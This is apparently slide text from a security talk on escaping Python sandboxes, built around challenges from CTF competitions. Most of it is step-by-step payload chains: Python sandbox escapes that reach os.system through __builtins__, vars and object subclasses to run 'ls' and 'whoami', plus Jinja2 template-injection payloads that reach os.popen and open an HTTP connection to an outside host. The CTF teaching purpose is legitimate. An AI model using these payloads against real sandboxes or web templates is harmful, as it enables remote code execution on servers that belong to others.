Escaping the python sandbox

There’s two things I really like: Capture the flag competitions and Python.
Fortunately, I have found out that there are challenges that combine both.
In my session I will talk about challenges from 3 different CTF competitions and about the upgraded challenges I wrote from PwCTF.
I will explain the difficulties of creating Python Sandbox and I will show the security issues in the wild.

Things you will learn from my session:
* Why Python Sandbox is a bad idea
* How to exploit Python Sandbox using knowledge of Python language to execute code remotely
* Why it’s hard to protect Python from code execution using Web Application Firewall
* At the end of the session you will get 3 pySandbox challenges to solve in order to check your abilities

No notes for slide

My name is Tomer Zait and I'm a security researcher on F5 Networks.
I’m practical software engineer and offensive security expert.
I Love CTF'S and writing open source software's.

By The Way Your are welcome to contribute code, or follow me in twitter or github.

Secure Pyshell:
print('')
print("")
print(".")
print(open)
print(__file__)
print(open(__file__))
print(getattr(open(__file__),"read"))
print(getattr(open(__file__),"read")())

print(__builtins__)
print(dir(__builtins__))
print(getattr(__builtins__,"vars"))
print(getattr(__builtins__,"va"+"rs"))
print(getattr(__builtins__,"va"+"rs")())
print(getattr(__builtins__,"va"+"rs")())
print(getattr(__builtins__,"va"+"rs")()["os"])
print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system"))
print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))

Zumbo 3:
{{1+1}}
{{request.environ}}
{{config}}
{%set a = 1+2%}{{a}}
{{config.__class__.__init__.__globals__}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

{{[].__class__.__base__.__subclasses__()}}
{{[].__class__.__base__.__subclasses__()[351]}}
{%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}}

http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool
https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask

print("".__class__.__mro__)
print("".__class__.__mro__[-1].__subclasses__())
print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage'))
print("".__class__.__mro__[-1].__subclasses__()[59].__init__)
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals)
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')

Ask
“What are the actual alternatives that omer simpson has”?